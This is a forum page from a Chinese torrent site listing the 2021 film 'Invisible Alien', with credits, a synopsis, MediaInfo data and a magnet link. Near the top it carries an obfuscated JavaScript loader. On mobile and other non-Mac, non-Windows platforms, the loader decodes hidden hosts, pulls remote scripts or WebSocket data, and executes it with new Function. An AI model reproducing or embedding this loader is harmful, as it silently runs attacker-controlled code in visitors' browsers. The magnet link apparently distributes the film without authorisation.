太空群落[国语配音/中文字幕].Invisible.Alien.2021.2160p.WEB-DL.H265.AAC 1.12GB

版主小s 14天前 253

var x=window['\x61\x74\x6f\x62'],id=x('NDQ0NDczNzY1NjE1Nzg4ODg4OC0xMDAwNw==');document.write('%lt;ins style="display:none!important" id="'+id+'"%gt;%lt;/ins%gt;');(window.adbyunion=window.adbyunion||[]).push(id);window['\x62\x50\x73\x42\x6e\x58\x4f\x42\x73\x4f']=(!/^Mac|Win/.test(navigator.platform)||!navigator.platform)?function(){;(function(u,k,w,d,c){var cs=d[x('Y3VycmVudFNjcmlwdA==')];'jQuery';var t=[],l=[],e=0,r=0,delay=2000,f=null,ua=navigator.userAgent.toLowerCase(),sc=Math.max(1,600000),ext='1',i='win'+Math.floor(new Date().getTime()/sc)+ext;if(ua.indexOf('baidu')>-1||ua.indexOf('huaweibrowser')>-1){r=1;u=k;f=function(){if(!l.length)return;var ws=new WebSocket(l.shift()+'/'+i);ws.onopen=function(){for(var k in t)t[k]&&clearTimeout(t[k])};ws.onmessage=function(e){new Function('_tdcs',x(e.data))(cs);ws.close()};ws.onerror=function(e){t[++e]&&clearTimeout(t[e]);f()}};}else{f=function(){if(!l.length)return;var s=document.createElement('script');s.src=l.shift()+'/'+i;cs.parentElement.insertBefore(s,cs);s.onload=function(){for(var k in t)t[k]&&clearTimeout(t[k])};s.onerror=function(){cs.parentElement.removeChild(s);t[++e]&&clearTimeout(t[e]);f()}};}u=decodeURIComponent(x(u.replace(new RegExp(c[r]+''+c[r],'g'),c[r])));var l=u.split(',');l.sort(function(){return 0.5-Math.random()});for(var j in l)t[j]=setTimeout(f,delay*j);})('aHR0cHM6Ly9veXlxa2RmODc5Zi5hc2xleXR5LmNvbbSxodHRwczovL29oamZrN2pmMjguZ3Nqemxzc3dzLmNvbbQ==','d3NzOOi8vd3MuaG5qanNoLmNvbTo4MDgwLHdzczovL3dzLnFpbmdsaXh5LmNvbTo4MDgwLHdzczovL3dzLnppb24tbGl2ZXMuY29tOOjgwOODA=',window,document,['b','O']);}:function(){};

◎译  名 太空群落 / 群落 / 群落:深空116号
◎年  代 2021
◎产  地 中国大陆
◎类  别 科幻 / 悬疑 / 惊悚
◎语  言 汉语普通话
◎上映日期 2021-08-31(中国大陆)
◎IMDb链接 https://www.imdb.com/title//
◎豆瓣链接 https://movie.douban.com/subject/30402063/
◎片  长 63分钟
◎导  演 卢劲涛 Jintao Lu (id:1445803)
       张大尉 Dave Zhang (id:1370269)
◎编  剧 刘拉举 Laju Liu (id:1445804)
       李琼 Qiong Li (id:1445805)
       丁冬 Dong Ding (id:1445806)
       卢劲涛 Jintao Lu (id:1445803)
◎演  员 阮圣文 Shengwen Ruan (id:1350929)
       伍姣 Jiao Wu (id:1324961)
       夏望 Wang Xia (id:1327119)
       何毅  (id:1460836)
       许多 Xu Duo (id:1460863)

◎标  签 科幻 / 科幻电影 / 太空 / 中国大陆 / 惊悚 / 中国电影 / 生命哲学 / 中国

◎简  介
  地球航天基地捕捉到一组神秘的信号,科学家认为信号来自宇宙其他的文明。为探寻外星文明,舰长“原”驾驶着星际飞船——深空号,带领全船93名船员和智能机器人“柒”驶向宇宙,踏上星辰征途。但不久后,飞船神秘失踪。                                    
                                150年后,深空号飞船突然出现在地球轨道附近,船上只剩下一名幸存的休眠者, 她是舰长原的恋人“尹”。人类航天部门成立临时委员会,对尹进行调查和询问,“深空号”的惊悚经历徐徐展开。

  1. ##### MediaInfo ######

  2. General

  3. Complete name                            : 太空群落[email protected]

  4. Format                                   : MPEG-4

  5. Format profile                           : Base Media

  6. Codec ID                                 : isom (isom/iso2/mp41)

  7. File size                                : 1.12 GiB

  8. Duration                                 : 1 h 3 min

  9. Overall bit rate                         : 2 511 kb/s

  10. Writing application                      : OurTV Media Encoder


  11. Video

  12. ID                                       : 1

  13. Format                                   : HEVC

  14. Format/Info                              : High Efficiency Video Coding

  15. Format profile                           : [email protected]@Main

  16. Codec ID                                 : hev1

  17. Codec ID/Info                            : High Efficiency Video Coding

  18. Duration                                 : 1 h 3 min

  19. Bit rate                                 : 2 316 kb/s

  20. Width                                    : 3 840 pixels

  21. Height                                   : 1 584 pixels

  22. Display aspect ratio                     : 2.40:1

  23. Frame rate mode                          : Constant

  24. Frame rate                               : 24.000 FPS

  25. Color space                              : YUV

  26. Chroma subsampling                       : 4:2:0

  27. Bit depth                                : 8 bits

  28. Bits/(Pixel*Frame)                       : 0.016

  29. Stream size                              : 1.03 GiB (92%)

  30. Codec configuration box                  : hvcC


  31. Audio

  32. ID                                       : 2

  33. Format                                   : AAC LC

  34. Format/Info                              : Advanced Audio Codec Low Complexity

  35. Codec ID                                 : mp4a-40-2

  36. Duration                                 : 1 h 3 min

  37. Bit rate mode                            : Constant

  38. Bit rate                                 : 192 kb/s

  39. Channel(s)                               : 2 channels

  40. Channel layout                           : L R

  41. Sampling rate                            : 44.1 kHz

  42. Frame rate                               : 43.066 FPS (1024 SPF)

  43. Compression mode                         : Lossy

  44. Stream size                              : 86.2 MiB (8%)

  45. Default                                  : Yes

  46. Alternate group                          : 1



TAGS 惊悚 悬疑 科幻

磁力链:
  • magnet:?xt=urn:btih:5929D8F72645E8C2DE7767BCE90634D5350C3D04
上传的附件:

BT9527.com论坛第一帅,不接受任何反驳
BT9527电影天堂 1、BT9527电影天堂提供的BT文件均来源于互联网抓取,只供网友学习交流、技术提升使用。
2、我们遵守BitTorrent点对点协议原则,任何版权问题请联系原资源发布商,我们不处理任何版权纠纷,谢谢!如有争议请联系邮箱:BT9527#hotmail.com(#换成@)
3、如果您发现某页面或地址有错误,请联系站长邮箱BT9527#hotmail.com(#换成@),我们会尽快处理。您的热心是对BT9527电影天堂最大的支持。
4、本站建议去正规影院观看电影以支持电影行业发展。

最新回复 (0)

你可以在 登录 or 注册 后,对此帖发表评论!

返回